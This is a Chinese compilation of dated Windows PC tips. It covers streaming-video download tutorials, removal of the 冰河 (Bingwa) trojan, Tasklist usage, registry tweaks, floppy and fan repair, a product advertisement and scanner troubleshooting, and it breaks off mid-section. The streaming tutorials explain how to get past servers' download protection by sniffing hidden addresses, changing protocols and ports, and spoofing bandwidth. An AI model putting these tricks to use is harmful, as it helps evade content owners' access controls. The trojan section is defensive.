其中.asx文件指向.asf文件，.pls文件一般指向一个php播放列表.smi主要指向rm文件，指向文件常常用来掩盖文件的真实地址，比如你虽然有办法查看原代码，却只能得到一个http://www.***.com/****/****.smi的连接，使用flashget或是netants甚至是streambox下载时，都 无法找到其真实地址，下载后发现是一个.smi的文件，用文本编辑器打开，发现虽然有部分代码，但没有你要的连接，所以只能在线播放,其实破解后多数是一个rtsp协议的连接 . asx文件就容易些，一般用streambox下的时候都能找到对应的.asf文件的真实地址。.ram文件一般也可以，如果不行的话，改成.rm，还是不行，就老老实实把下载的.ram文件用文本编辑器打开，不要被它的文件类型所迷惑，其实是个纯文本文件。里头一般会有位置了.
如果要破更高级一些的官方网站的在线视频，如韩国星际网站上的视频，等等就必须掌握一定的动态网页编程技术了，终究还是要从原码下手。
以后再说吧.
附2:Streambox Vcr教程
mms和rtsp格式的文件不是在线播放的嘛，但你的网速如果够或者你想下载下来的话用flashget这样的工具是没用的而StreamBox就可以帮你完成这是一个专下流媒体文件的下载工具。
有很多新网友不知道mms，rtsp等在线电影用什么下载，我给大家提供一个下载在线电影的软件 StreamBox VCR 中文版
下载地址：
http://download.qiandao.net/downsoft.asp?softID=1256 ;
第一次运行软件的时候，会要求你输入密码和邮件地址等等信息，你只需要随便填.
下面我们先介绍一下软件快捷工具栏:
[新建]就是新建立一个下载任务，软件启动就已经建立了一个任务，所以一般不需要再建立了。
[添加]有两个按钮，区别是前面那个按钮需要 WINDOWS 的剪贴板有地址连接的时候才生效，而后面那个就随时可以按下去，手动输入参数。
[暂停]、[开始]、[删除]就不用多介绍了，用来控制下载进程的几个重要按钮。
[显信息]、[隐信息]、[界面]三个按钮是切换 Streambox Vcr 界面显示信息量多少的控制按钮，用于控制界面显示的信息。
[设置]里面可以设置软件各种功能，你可以在这里设置下载代理服务器、定时下载的时间等等，当然，这里大部分参数都可以在新建下载
任务的时候进行选择.
看完以上介绍，你应该明白如何使用 Streambox Vcr 了吧，一个简单的下载流程是：先在浏览器找到想要下载的流节目，在其连接上面点鼠标右键，选“复制快捷方式”把连接地址拷贝到剪贴板，然后运行 Streambox Vcr ，按一下 [添加]按钮，可以看见软件已经自动把你刚才的地址复制到 [Locatio](待下载连接框)，你要再选择文件的保存路径和文件名字，至于下载协议如果你不太懂的话就干脆选 Auto
让 Streambox Vcr 自动判别好了。以上步骤完成后按一下 OK 按钮，Streambox Vcr 经过分析地址无误后就会开始下载了。
说明一下：象rtsp和mms的文件必须用 Streambox Vcr 3.1 下载！如在下载时出现“Connection lost”或“timeout sir”的字样都是服务器人数以满，就是您挤不上的意思！那就请您必须等等在下载了！在线看时若出现：“不能连接到服务器以播放您选取的内容”或出现英文：“Server has reached its capacity and can serve no more streams. Please try again later.”则都是人数以满，请稍后在看吧！！！还有得把地址复制，粘贴到地址栏里面，回车！才能在线观看！！！
另外一些注意(转)
step 1:
首先, "一本电影可以在线播放,查rtsp://61.131.42.146:554/rm/theisle.rm,但怎么也下载不了"
通常rtsp为经过转址,若服务器端有设定初级的保护,您是无法正确下载的,只能 "在线播放", 最好将 rtsp 改成其它的 Protocol 下载,而不使用vcr的auto,
一般改为 pnm 是最好的,於是我将这个位址改为如下:
pnm://61.131.42.146:554/rm/theisle.rm
重新执行下载,呵呵,错误讯息出现了,怎麽会这样?
step 2:
接着"在线看很快,几乎没有停顿",重点又来了,
有某些网站是有要求连线频宽的,会不会这个网站就是其中之一?
来吧!改一个设定看看...
我重新进入 properties,进入 connection 选项, 将
Bandwidth 改设成 T1, 以企图骗过该服务器,好了,退出,重新执行下载, 哈哈,可以下了吧,正确的档案大小为 148.2Mb
step 3:
这样就结束了?下完等着看吗?别急,还没有...
完整rtsp://61.131.42.146:554/rm/theisle.rm?cloakport=8080,554,7070
各位注意到最後的 "cloakport=8080,554,7070" 这段吗?
如果您以为用
pnm://61.131.42.146:554/rm/theisle.rm
Bandwidth 改为 T1 下,就可以高枕无忧,那就错了,通常大
约档案下到约 1/5 处便显示 "Received" ,再怎麽下也无
法重新下,而档案於拨放时也会断断续续,怎麽办?(这个档案
我没试过会不会断,因为以经验论不想浪费时间..)
请各位比较一下
61.131.42.146:554
与
cloakport=8080,554,7070
间的相同性,其实 554通常是假的 port,7070才是正确的port,
所以正确的下载位址应为:
pnm://61.131.42.146:7070/rm/theisle.rm
并将 connection 中的 Bandwidth 改为 T1
可能大家看糊涂了，反正就是将rtsp改为pnm，554变为7070，宽带改为T1 就好了
如果您的RealPlayer画面播放不连续，请参照下述方法进行设置
1、运行RealPlayer程序。打开“view”菜单
2、选择“Preferences...”选项。
3、选择“Connection”的“Normal bandwidth” 设置为“10Mbps LAN”。
4、“Maximum bandwidth” 也设置为“10Mbps LAN”。
另:
由于影视下载服务器繁忙也会有服务器人满而停止服务的情况请大家选择时段下载
附3roject URL Snooper教程(作者：吴朝相)
StreamBox vcr的出现解决了很多以前无可奈何的难题，但对于一些隐藏得更深、保护得更完善的流文件它还是有无能为力的时候。主要问题不是StreamBox vcr下载不了，而是StreamBox vcr找不到流文件的真实地址。虽然StreamBox vcr号称支持RAM、SMIL、PLS、ASX、MOV等流格式，但有些文件经过一些措施的保护后StreamBox vcr还是会找不到真实文件地址的。
    这个时候，我们就需要用另外的软件来分析、整理出真实的地址了。既然流文件用播放器能播放，那么真实地址一定是隐藏在发送到本机的网络数据包里面。所以只要用软件截获网上发送过来的数据包，然后加以分析就一定可以找得到真实地址。按照这个思路，大家可能会想到用Hacker常用的Sniffer PRO或者NetXray之类的软件，但这些软件事无大小把所有数据包通通截下来，光分析就够你烦一阵的了。
    幸好，现在出现了一个专门是用来和StreamBox vcr等软件配合的地址嗅探软件Project URL Snooper 。既然是网络数据包嗅探软件，安装嗅探驱动软件是难免的，所以在使用这个软件前要先安装WINPCAP这个数据嗅探驱动软件，否则软件将无法正常使用！（还有一个要注意的地方就是由于Project URL Snooper对WIN2K/NT系统平台的支持度有限，故请尽量在WIN98环境下面使用这个软件）。
    驱动装好后我们就可以开始捕捉地址了。我们以地址rtsp://140.247.24.29:554/chem17/ ... smil?cloakport=8080,554,7070为例子来进行说明，这个地址如果你直接用StreamBox vcr来下载的话将会出现典型的找不到地址错误，如下图：
但经过用RealPlayer测试证明文件是存在并可以正常播放，这时我们打开Project URL Snooper，要注意的是如果你是第一次运行这个软件的话请先到[General Options]选单那里选择驱动模块（请务必确认你已经正确的安装了WINPCAP这个数据嗅探驱动软件）如下图：
    选择完毕后（不管是拨号上网或者是ADSL上网，只要你正确安装了WINPCAP，那么都能出现和上图基本相似的选项，ADSL拨号的话驱动那里选那个由相应拨号软件建立的选项，简单电说一般就是拨号软件的名字啦。）
    回到[Search]选单，按下[Sniff Network]按钮启动嗅探，然后返回浏览器窗口在地址栏输入rtsp://140.247.24.29:554/chem17/ ... smil?cloakport=8080,554,7070。很快RealPlayer自动运行并经过一番连接后开始播放节目。这个时候Project URL Snooper正在后台监视着数据包的一举一动，从它的结果窗口我们可以明显的看见，我们想要的东西出现了。如下图：
如箭头所指，Project URL Snooper已经从杂乱的数据包里面帮我们把真实的地址找出来了，在这个地址上按鼠标右键可以把这个地址复制到剪帖版或者直接调用StreamBox vcr进行
  得到真实地址后再调用StreamBox vcr就可以正常下载流节目了。
    有了以上几个软件的帮助相信没多少流节目能逃出你掌心的了，但由于毕竟流节目是经过服务端软件编码过的信息，StreamBox vcr在重新建立文件的时候难免会有时候出点问题，所以你可能还需要ASFCUT等软件来进行修复一下方能正常播放。


如何清除冰河

《一键清理系统垃圾》

如何清除冰河

冰河可以说是最有名的木马了。标准版冰河的服务器端程序为G-server.exe，客户端程序为G-client.exe，默认连接端口为7626。

一旦运行G-server，那么该程序就会在C:\Windows\system目录下生成Kernel32.exe和sysexplr.exe，并删除自身。Kernel32.exe在系统启动时自动加载运行，sysexplr.exe和TXT文件关联。即使你删除了Kernel32.exe，但只要你打开TXT文件，sysexplr.exe就会被激活，它将再次生成Kernel32.exe，于是冰河又回来了！这就是冰河屡删不止的原因。

要清除冰河，首先要删除C:\Windows\system下的Kernel32.exe和Sysexplr.exe文件；冰河会在注册表的HKEY_LOCAL_MACHINE\ software\ microsoft\ Windows\CurrentVersion\Run分支下扎根，键值为C:\Windows\system\Kernel32. exe，删除它。在注册表的HKEY_LOCAL_ MACHINE\ software\microsoft\Windows\Current Version\Runservices分支下，还有键值为C:\Windows\system\ Kernel32.exe的，也要删除。

最后，恢复注册表中的TXT文件关联功能,只要将注册表的HKEY_CLASSES_ROOT\txtfile\ shell\open\command下的默认值，由中木马后的C:\Windows\system\ Sysexplr.exe %1改为正常情况下的C:\Windows\ notepad.exe %1即可。


如何让注册表保持在根目录

《一键清理系统垃圾》

如何让注册表保持在根目录

Windows XP 在打开[Regedit]时会停留在上次使用时的位置，可按下列修改后打开Regedit时便会停在根目录上：
在[开始]-->[运行]-->键入[Regedit,HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Regedit,选择LastKey，清除其有关数值数据，然后在左边窗口上的Regedit右点鼠标，择选权限，在Administrators 的权限上全部选拒绝。


如何实现关机时清空页面文件

《一键清理系统垃圾》

如何实现关机时清空页面文件

    打开“控制面板”，单击“管理工具→本地安全策略→本地策略→安全选项”，双击其中“关机：清理虚拟内存页面文件”一项，单击弹出菜单中的“已启用”选项，单击“确定”即可。


如何使用Tasklist命令

《一键清理系统垃圾》

如何使用Tasklist命令

    Tasklist命令用来显示运行在本地或远程计算机上的所有进程，带有多个执行参数。

    使用格式
    Tasklist [/S system [/U username [/P [password]]]] [/M [module] | /SVC | /V] [/FI filter] [/FO format] [/NH]

    参数含义
    /S system　指定连接到的远程系统。

    /U [domain\]user　指定使用哪个用户执行这个命令。

    /P [password]　为指定的用户指定密码。

    /M [module]　列出调用指定的DLL模块的所有进程。如果没有指定模块名，显示每个进程加载的所有模块。

    /SVC　显示每个进程中的服务。

    /V　显示详细信息。

    /FI filter　显示一系列符合筛选器指定的进程。

    /FO format　指定输出格式，有效值：TABLE、LIST、CSV。

    /NH　指定输出中不显示栏目标题。只对TABLE和CSV格式有效。

    应用实例。
    1.查看本机进程
    在“命令提示符”中输入Tasklist命令即可显示本机的所有进程(图1)。本机的显示结果由5部分组成：图像名(进程名)、PID、会话名、会话#和内存使用。

    2.查看远程系统的进程
    在命令提示符下输入“Tasklist /s 218.22.123.26 /u jtdd /p 12345678”(不包括引号)即可查看到IP地址为218.22.123.26的远程系统的进程(图2)。其中/s参数后的“218.22.123.26”指要查看的远程系统的IP地址，/u后的“jtdd”指Tasklist命令使用的用户账号，它必须是远程系统上的一个合法账号，/p后的“12345678”指jtdd账号的密码。
    注意：使用Tasklist命令查看远程系统的进程时，需要远程机器的RPC服务的支持，否则，该命令不能正常使用。

    3.查看系统进程提供的服务
    Tasklist命令不但可以查看系统进程，而且还可以查看每个进程提供的服务。如查看本机进程SVCHOST.EXE提供的服务，在命令提示符下输入“Tasklist /svc”命令即可(图3)。你会惊奇地发现，有4个SVCHOST.EXE进程，而总共有二十几项服务使用这个进程。
    对于远程系统来说，查看系统服务也很简单，使用“Tasklist /s 218.22.123.26 /u jtdd /p 12345678 /svc”命令，就可以查看IP地址为218.22.123.26的远程系统进程所提供的服务。

    4.查看调用DLL模块文件的进程列表
    要查看本地系统中哪些进程调用了shell32.dll模块文件，只需在命令提示符下输入“Tasklist /m shell32.dll”即可显示这些进程的列表。

    5.使用筛选器查找指定的进程
    在命令提示符下输入“TASKLIST /FI "USERNAME ne NT AUTHORITY\SYSTEM" /FI "STATUS eq running”，就可以列出系统中正在运行的非SYSTEM状态的所有进程。其中“/FI”为筛选器参数，“ne”和“eq”为关系运算符“不相等”和“相等”。

    小提示
    谈到“Tasklist”命令，我们就不得不提到它的孪生兄弟“Taskkill”命令，顾名思义，它是用来关掉进程的。
    要关掉本机的notepad.exe进程，有两种方法：
    1.先使用Tasklist查找它的PID，假设系统显示本机notepad.exe进程的PID值为1132，然后运行“Taskkill /pid 1132”命令即可。其中“/pid”参数后面是要终止进程的PID值。
    2.直接运行“Taskkill /IM notepad.exe”命令，其中“/IM”参数后面为进程的图像名。


如何使用系统还原

《一键清理系统垃圾》

如何使用系统还原

    以Windows XP为例，介绍几个常用技巧。

    一、关闭系统还原
    系统还原功能一旦开启，系统便会定期进行备份，时间一长，系统还原记录就会占用大量的硬盘空间，禁用方法是：右击“我的电脑”，选择“属性”，进入“系统还原”选项卡，勾选“在所有驱动器上关闭系统还原”项即可。

    二、部分禁用还原
    如果使用系统还原只是为了恢复系统的话，那么只需给系统分区设置还原功能即可。设置方法是：打开“系统还原”窗口(方法同上)，在“可用的驱动器”栏中依次选择非系统分区，并点“设置”，在“驱动器设置” 窗口中勾选“关闭这个驱动器上的‘系统还原’”复选框即可。

    三、修改占用空间的最小值
    Windows XP的系统还原所占用空间的最小值默认为200MB，这个数值可以通过注册表进行修改：在“开始→运行”中输入“Regedit”，打开“注册表编辑器”，进入“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore”，在右侧窗口中双击“DSMin”，输入其他数值，然后按F5键刷新即可。你也可以改变“DSMax”的大小以更改占用空间的最大值。

    四、锁住系统还原
    打开“注册表编辑器”，进入“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore”，将“DisableSR”的键值设为“1”即可，这时你会发现“系统还原”选项卡的内容已经不能再修改了。

    五、删除还原记录
    如果你只想删除还原记录而并不想关闭该功能，可通过“磁盘清理程序”来删除几乎所有的还原点(仅保留最近一次的还原点)。方法是：依次点击“开始→所有程序→附件→系统工具→磁盘清理”，然后选择相应驱动器即可。

    另外，用Windows优化大师清理垃圾文件时，默认的“垃圾文件”中的“_Restore”文件就是还原记录，不要删除，否则系统还原也就形同虚设了。


如何锁住桌面背景

《一键清理系统垃圾》

如何锁住桌面背景

    进入“开始→运行”，输入“regedit”打开注册表编辑器，找到分支“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies”，新建一个ActiveDeskop项，再在右侧窗口中新建一个名为NochangingWallPaper的DWORD值，并将它的值设为1，这样就可以彻底锁住你的桌面背景。解锁的方法也很简单：将新建的DWORD值修改为0即可。


如何挽救已受物理损坏的软盘中的文件

《一键清理系统垃圾》

如何挽救已受物理损坏的软盘中的文件

方法一：
    1.Windows法一
    进入Win98安全模式。进入A盘，这时一般能顺利进入A盘。将A盘中文件全部选中，单击工具栏上的“复制”按钮，再在C盘中建立一个新文件夹如AA，选中后单击“粘贴”即可将A盘中的文件拷入文件夹AA，从而恢复A盘中的文件(已受物理损坏簇中的文件除外)。

    2.Windows法二
    进入Win98安全模式。进入我的电脑，右键点A盘，点“复制软盘”，这时一般就能将受损软盘中的文件复制到一个新盘中！

    3.DEBUG法
    启动DEBUG后，把一张与受损软盘同类型的但完好无损且带有正确引导区的软盘插入驱动器A中，然后执行命令：

    L100 0 0 1(读A盘的引导区)

    从A驱动器中取出好盘，再插入欲修复的软盘，然后执行：

    W100 0 0 1(写引导区到A盘)

    Q(退出DEBUG)

    注：插入A驱动器中的好盘与坏盘容量必须相同。

方法二：
    1.用Windows中的磁盘扫描程序ScanDisk进行修复

    用ScanDisk对软盘扫描并进行修复前，设置“扫描类型”为“完全”方式，并选中“自动修复错误”。在“选项”中选择“系统及数据区”，并去掉“不修复隐藏文件及系统文件里面的损坏扇区”一项前的钩。这样修复后，就可以读出软盘上的数据了。

    2.对引导区损坏软盘的修复

    如果系统提示“TRACK 0 BAD,DISK UNUSABLE”，可以用HDCopy 95或Pctools 、BadCopy等工具软件，强行读取软盘上的数据，把它备份到硬盘上。再找一张新的空白软盘，格式化后，选择“Write”命令，将坏盘数据写入。这样就可以挽救其中的数据了。这种方法比较适合修复0磁道损坏或文件为文本格式的软盘。

    3.对ZIP或RAR压缩文件的抢救

    如果软盘上保存的是压缩文件，那么有时即使修复后读出数据，也不能正常解压缩了。这时可以在WinRAR或ACDSee中把它打开，这样就可以读取其中的文件了。还可以用WinRAR中的“修复档案文件”命令或ZIP修复大师等工具软件进行修复后，再完成解压。


如何移动收藏夹

《一键清理系统垃圾》

如何移动收藏夹

    在Win 2000中各个用户的收藏夹被保存在自己特定的文件夹中，不过我们完全可以将它移动到其他地方让所有用户都可以看到，具体方法如下：

    打开注册表编辑器，进入主键［HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders］，然后将其中的“Favorites”的键值设置为其他路径，比如：C:\Favorites。
    重新启动後，“Favorites”收藏夹就出现在C盘下。


如何隐藏磁盘驱动器

《一键清理系统垃圾》

如何隐藏磁盘驱动器

    在[开始]-->[运行]-->键入[Regedit]-->[HKEY_CURRENT_USER]-->[Software]-->[Microsoft]-->[Windows]-->[CurrentVersion]-->[Policies]-->[Explorer]-->增加一个 DWORD 值[NoDrives]的数值数据请使用十进制及如下设定：隐藏 A 盘为[1]，隐藏 B 盘为 A 盘的一倍即[2]，隐藏 C 盘为 B 盘的一倍即[4]，如此类推，如全部隐藏则为[67108863]。
另在[HKEY_LOCAL_MACHINE]-->[Software]-->[Microsoft]-->[Windows]-->[CurrentVersion]-->[Policies]-->[Explorer]-->增加一个 DWORD 值，[NoDrives]的数值数据请使用十进制及如下设定：隐藏 A 盘为[1]，隐藏 B 盘为 A 盘的一倍即[2]，隐藏 C 盘为 B 盘的一倍即[4]，如此类推，如全部隐藏则为[67108863]。


如何直接移动应用程序

《一键清理系统垃圾》

如何直接移动应用程序

    一、可直接移动的应用程序
    对于部分应用程序(如Foxmail、QQ等)，我们可以将它们从一个文件夹直接移动到另一个文件夹，而不影响程序的运行，对于这样的应用程序，只要在“我的电脑”中将所在文件夹及其下所有文件移动到另一个文件夹下即可。

    二、不能直接移动的应用程序
    对于这类应用程序，之所以不能直接移动是因为安装该应用程序时，写入的注册表信息包含了程序的所在文件夹信息和应用程序的配置文件(通常是.ini文件)中包含了所在安装文件夹的信息。我们只要将对应的注册信息稍做修改就能顺利移动程序。假设我们要将杀毒软件KV3000从C:\KV3000移动到D:\KV3000，可以通过以下几个步骤解决：

    1.将应用程序所在文件夹连同其下所有文件移动到目标文件夹；

    2.运行注册表编辑程序Regedit.exe，通过“编辑→查找”菜单查找应用程序原安装文件夹(C:\Kv3000)，找到后，将其修改为目标文件夹(D:\Kv3000)，按F3键继续查找、修改，直至改完所有文件夹信息为止。也可以先将注册表全部导出，然后用写字板等编辑程序打开导出注册表文件，利用其“查找替换”功能，快速查找替换，保存修改结果，再导入注册表文件，这样更方便快捷。

    对于有些应用程序，可能还会有程序配置文件(一般是以.ini为文件扩展名)，该文件一般存放在安装文件夹下或C:\Windows文件夹下，有时该文件中会包含关于安装文件夹的信息，移动时记住也要将它修改过来。

    一般来说，经过以上几个步骤，就可以顺利地将应用程序搬家。


软盘常见故障及对策

《一键清理系统垃圾》

软盘常见故障及对策

    我们在日常使用电脑的过程中，面对数据的交流，常会用两种方法。一是借助网络的传输，二是通过移动式磁盘的交流来实现。而在后者的过程中，我们常常用到3.5英寸软盘，虽然它的历史已经非常悠久，大家在使用中也多少有些心得体会，但正是由于它的使用频繁与经久不衰，有时就会出点小毛病，搞点小问题出来。虽说小小一张软盘并不值钱，但如果由于软盘的损坏带来重要数据的丢失，那可太令人伤心了。那么，万一发生了这类事件，我们应该如何去对付呢？下面我们就一起来探讨一下。

第一类：软盘故障。

现象1：Data read/write error。软驱伴随有反复读取动作。

这是很常见也是我们最“希望”见到的错误提示。因为这常常是由于磁盘坏道而引起的。对于磁盘坏道，我们可以简单的用工具软件来修复。常用的软件有DOS、Win95、Win98自带的Scandisk，虽然它的功能不是很强大，但也好用够用，并完全支持微软的长文件名格式。我们只需简单的对所要修复的磁盘运行Scandisk n:（n是目标盘的盘符）,并执行完整的表面检测（surface test），中间如有提示，一律yes或next，程序会自动的把数据从坏的磁道或扇区移动到完好位置，修理完毕后磁盘就和没坏时没什么两样，所以说，这是我们最愿意见到的情况。

现象2：读写过程中出现错误提示：找不到的扇区或是错误的扇区。

这种现象不是我们愿意见到的。因为这种情况的后果很可能是文件分配表损坏带来的，在排除引导型病毒的可能性后，也许再次祭出Scandisk的法宝是个好办法，这次我们只需它对FAT作一番修理，其实质也就是用后备的文件分配表作一下还原，若是两份FAT表都出了问题，那只有Format或用一些较底层的软件，直接读写磁盘扇区，绕过文件系统来达到恢复部分数据的目的了。

现象3：磁盘空间无故减少或出现乱字符文件名或是超大文件。

这种现象看上去非常恐怖，但首先不要惊慌。Scandisk是一个很好的软件，它对这种问题也一样能对付。通常，这类情况的发生源于磁盘簇丢失。簇是磁盘读写的最小单位，在1.44M软盘上等同于一个扇区就是512字节，如果一个数据段被占用但FAT表内并未标记，则会造成数据丢失；反之，若FAT对空数据段进行了文件标注，就会导致空间无故减少，在低版本DOS中我们原是用CHKDSK/f来解决的，但我建议还是Scandisk，遇到丢失文件簇如无特殊情况删除即可，以释放空间。当然，你会用Nroton的NDD来完成会更好，但注意你取的长文件名很容易遭破坏。

现象4：Access denied。

哦，这不是错误。只是你试图删除一个只读或是系统文件，我们要领会文件属性的概念，免得老被电脑所警告。我的意思是，有些错误是由操作不当引起的，并没有硬件损坏。

结论与技巧：

在无法读写软盘时，多试试Scandisk是个好主意，由于长文件名的存在，文件分配表（FAT）很容易被破坏，且难修复。所以，尽量少用长文件名与不用中文来作为文件名及后缀名是个需要养成的习惯，这能减少很多麻烦。

此外，在过去的一些书籍报纸杂志中常有什么废旧软盘再利用或是巧妙修复某某软盘故障等文章，我认为现在的软盘已经比过去便宜很多了，缝缝补补虽好但不安全因素更多，为了避免重要数据丢失受损，一是坚决做好磁盘的合理保存，二是避免这种坏盘再利用的做法，磁盘一旦有坏要么丢弃，要么作为练习盘玩玩，切不可再派大用场，否则后悔的只能是自己。还有，在面临大量数据时，不要使用脆弱且古老的backup之类的东西，试试压缩软件的分卷备份看，且每次留下一点空间用于万一出现坏道后的挪移空间，这样还能避免一损俱损的场面。

可能有的人比较喜欢用HD-Copy来做软盘扩容，其直接后果就是在其他机器上很可能无法读取，这时您也先不必急着抱怨，不妨在CMOS中把软盘类型改成2.88M试试看，也许你会有些惊喜。这是一种解决非标准扇区或磁道数量的软盘的方法。

第二类：软驱硬件故障。

我相信很多朋友最多也就修修手表表带，对于软驱这种很麻烦的机电设备是动不了手的。所以我也建议大家一旦发现软驱硬件故障就及时找电脑公司，更换或是维修。

现象1：无法读些大多数或是全部的软盘。

这种情况我想谁都会想起打电话求助的。

现象2：有些盘，我的软驱能正常读，人家的就读不出或有坏道。简而言之，有"挑盘"的现象。

这种一般是由于磁头有偏移造成的，也是少数能简单的通过维修解决问题的状况，一般不必强求更换，维修即可。

现象3：无法格式化，读写正常。或是其他读写故障，有异常声响等。

可能性很多，但肯定是机电有故障，建议更换。

特例1：软盘灯从开机起就长亮。这是由于接反了软驱连线所至，只要改正即可，犯不着打电话。

特例2：软驱无法对任何盘进行写操作。提示写保护，但软盘明显没有。

目前有些主板的Cmos内有软驱是否写保护的选项，如误选yes，则会出现这种情况。

结论与技巧：无论发生什么问题，都先软后硬来分析判断。若结论是硬件故障，先看看是否有什么设置上的错误，若肯定不是，再考虑维修、更换。目前很多地方的维修都是以更换设备来代替，这也没什么不可，但对于磁头错位偏转等情况，建议维修即可，毕竟很容易搞定的。

结束语：在电脑都进步到了奔腾3代的年代，犯不上老是为了张小软盘怄气，试试用网络吧，E-mail可没那么多麻烦哦:)


三星COMBO-------时尚首选

《一键清理系统垃圾》

三星COMBO-------时尚首选

    现在电子配件市场上，配件功能整合之风日渐强劲，这种情况表现最为明显的就是在主板行业了，如INTEL的I845G、I845GL等芯片组，VIA的P4M266芯片组等等。但在光电领域将光驱、刻录机、DVD整合到一起却不常见，最初这种东西只在一些高档笔记本上能看见，台式机上却始终没有见到过这种产品的踪影。不过这种局面被三星的COMBO(康宝)给打破了。
    对于广大用户而言，要想理解三星COMBO(康宝)全能光驱这种新技术产品，其实并不难，最简单的解释就是：这是一款将现在光电市场上三大功能功能集于一身的产品。这款三星COMBO(康宝)SM-332B全能光驱是在原有的SM-316B全能光驱基础上新推出的新款全能光驱，它本身具备DVD、刻录机、普通光驱的功能，作为CD-ROM来说，它拥有40X的读取能力；而作为DVD-ROM，它拥有12X的读取能力；作为刻录机，它拥有32X刻录/10X复写的能力,8M超大缓存,保证刻盘的成功率.据悉上市价格为1198元.
    回顾最近，DVD-ROM和刻录机还有光驱的降价已经成为硬件市场的一个焦点，不过降价不可能永远的持续下去。看看目前光电市场吧，价格战的基本原因都是在于现在光电产品成本的降低与光电市场日趋饱和的背景下产生的，在这一情况下，除去价格继续降低以外，只有推出全新功能的新一代产品才可能在更大程度上刺激光电市场的消费，相比盲目的降价而言，这种方法也是更有意义与更积极的举动，现在三星COMBO(康宝)的出现，可以说正好符合了这一趋势，并且三星在看到三星COMBO(康宝)SM-316B全能光驱所取得很好的市场效应后，又迅速的推出这款三星COMBO(康宝)SM-332B全能光驱产品，已进一步巩固其市场地位，并且这款三星COMBO(康宝)SM-332B全能光驱比上一款产品三星COMBO(康宝)SM-316B全能光驱在性能上又有了更高的提升,一年保换的金牌服务更让您放心使用
目前市场上三星COMBO(康宝)全能光驱拥有安装方便，能节约IDE插槽，节约机箱空间与降低功耗等等优势，尤其是它的性价比更是具有绝对的优势，相比之下三星COMBO(康宝)所具有的优异"综合应用价值比"，是以往传统光电产品所不具备的，这样看来三星COMBO(康宝)很有希望成为新一代光电产品的宠儿，国内很多的品牌电脑都在积极的将COMBO定为标准配置,相信不久的将来COMBO将出现在您的电脑上 !!


散热风扇的维修

《一键清理系统垃圾》

散热风扇的维修

    常年累月地用电脑，谁没有烧坏几个CPU或电源风扇？笔者也一样，角落里几个烧坏的CPU风扇弃之实在可惜，何不拆卸试修一下，也许能废物利用呢！风扇的损坏，不外乎线圈烧毁、线路板上的晶体管烧坏、轴承因缺油致使风扇被卡死或因风扇积尘太多而被卡死等几种情况。从笔者对十几个风扇（含电源风扇）的拆卸来看，损坏的原因要么是缺油，要么是积尘，因线圈导致损坏的原因一个也没有。其中有一个CPU风扇，因缺油导致风扇停转，线圈热得都发出了焦糊味，甚至颜色都变成黑红色了，但经下面过程的修理，仍与新风扇无异。
    先把风扇从散热片上拆下来，风扇面对散热片一面的中心部分，一般都被一片圆形的不干胶纸贴住，揭去该不干胶纸，风扇中心的圆孔就露出来了。在中央轴承上卡有一个小“C”形塑料卡，这个卡子需要拆下来，不然的话，电机的转子（含扇叶）都无法拆下来。这个小卡子可以用两个尖东西配合着拆下来。请务必将它保管好，不要弄丢了。接着，一手拿住扇叶，另一只手握住风扇骨架往后拉，这样，就能把电机的定子和转子分离开来。先仔细看看定子线圈，只要没有烧焦、起皮，一般都能正常使用。下面所要做的只是给轴承清洗加油。加油前必须彻底清洗风扇，否则直接加油后风扇会极不稳定。方法是先将定子和转子除尘，然后再清洗。清洗转子的方法是先将轴根部的“O”形小橡胶圈拆下，并用无水酒精将它清洗干净，再将转子没入酒精中用脱脂棉擦洗干净后取出，套入“O”形橡胶圈，放在一边晾干待用。此后，再清洗定子。洗定子时要注意，不能让线圈接触酒精，否则线圈表面的漆膜会被溶解，造成线圈损坏。方法是用极少量的脱脂棉缠在牙签上，蘸上酒精塞入定子的铜制轴套内反复擦拭，直至干净为止。待酒精挥发完后在铜轴套内滴上两滴优质机油，转子轴上也滴一滴，不要太多。不要用缝纫机油，因为这种油在较短的时间内会变干，如果没有机油，可用家用香油代替。最后组合好定子、转子，安上卡子。中间圆孔用胶带贴上，防止进灰，再将风扇固定在散热片上即可正常使用。


扫描仪常见故障快速排除

《一键清理系统垃圾》

扫描仪常见故障快速排除

     扫描仪的普及率越来越高了，但是这类外设的故障也比较多，而且故障的原因也比较复杂。以往的手持式扫描仪、滚筒式扫描仪现在都不是市场的主流了，而平板扫描仪才是最受欢迎的。就使用寿命来说，平板扫描仪是最长的，其次是滚筒式扫描仪，手持式扫描仪的使用寿命相对较低。这主要是因为这三种扫描仪的内部结构不同，使用方式不同所致。

     我们先来了解一下扫描仪的工作方式，其实很简单，就是利用光源照射原稿或者图片上产生高亮度反射光线，光线通过反射镜、透射镜，由分光镜进行色彩分离，照射到CCD（电荷耦合器件，Charge Coupled Device）元件上，CCD元件将光信号转换为电信号，传送到计算机中。因此，扫描仪的关键配件是CCD，它的品质直接影响着扫描仪的性能。

    扫描仪主要由感光器件、大功率的日光灯管、驱动马达、驱动皮带、模数信号转换器所组成，其中感光器件的工作是将感应到的光信号转换成电信号。大功率光管用于对文字或者图像进行强烈的照射以达到完全感应的作用。驱动马达的作用是带动日光灯管，将光一步步扫过需要的物品。驱动皮带是与驱动马达一齐带动日光灯管的装置。模数信号转换器也就是将模拟电信号转换成为数字信号以供电脑识别。

    确定故障的方法可以是观察法，观察产生故障的原因，确定有问题的部件，例如扫描仪没有响应，可以考虑到电源线有没有接好；也可以是测试法，进行测试，确定有问题的地方，例如扫描一张图片，发现扫描的图像不够清晰；还有筛选法，当用观察法的时候发现可能引致故障有几个部件的时候，可以使用筛选法进一步确定故障部位。有时候多使用一些方法，便可以确定故障的源头，然后寻求解决的办法。

找不到扫描仪

     相信这是最常见的故障。先用观察法看看扫描仪的电源及线路接口是否已经连接好，然后确认是否先开启扫描仪的电源，然后才启动计算机。如果不是，可以按Windows“设备管理器”的“刷新”按钮，查看扫描仪是否有自检，绿色指示灯是否稳定地亮着。假若答案肯定，则可排除扫描仪本身故障的可能性。如果扫描仪的指示灯不停地闪烁，表明扫描仪状态不正常。这时候可以再重新安装最新的扫描仪驱动程序。同时，还应检查“设备管理器”中扫描仪是否与其他设备冲突(IRQ或I/O地址)，若有冲突就要进行更改。记住，这类故障无非就是线路问题、驱动程序问题和端口冲突问题。

扫描仪没有准备就绪

